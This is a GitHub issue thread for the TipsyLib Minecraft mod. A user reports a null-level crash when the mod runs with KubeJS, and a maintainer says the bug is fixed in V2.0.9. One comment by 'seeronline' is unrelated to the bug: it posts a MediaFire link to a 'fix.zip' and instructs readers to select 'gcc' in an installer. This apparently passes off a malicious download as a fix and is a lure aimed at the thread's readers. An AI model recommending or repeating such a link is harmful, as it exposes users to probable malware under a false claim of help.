### ISSUE TITLE
 Having the mod installed causes the level to be null in some circumstances

### ISSUE THREAD

**Issue by HypnoticChris** [Yirmiri/TipsyLib#5]
Unsure if you are familiar with the mod KubeJS but I found this issue out that when having TipsyLib installed, code that I had was returning the level as null despite working before. I am no modding expert so I couldn't tell you why this may be happening. I am not sure what this kind of issue may also affect outside of the circumstance I encountered it in, but I assume it can't be good.

Attached is one of the crash logs from the level being null, I can try and provide any other information you may need.
[2024-08-25-5.log.gz](https://github.com/user-attachments/files/16742470/2024-08-25-5.log.gz)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by KekeCreations** [comment]
This issue is fixed in V2.0.9.

Just a friendly reminder the mod got rewritten in 1.21 and instead of having tons of effects we turned them into attributes so they can be used in different ways! You can still use something like kubejs to create effects with the attributes and I created a tutorial on how to do this on the wiki. All effects in 1.20.1 will be recreatable in 1.21 using kubejs!

Thank you for reporting issues!
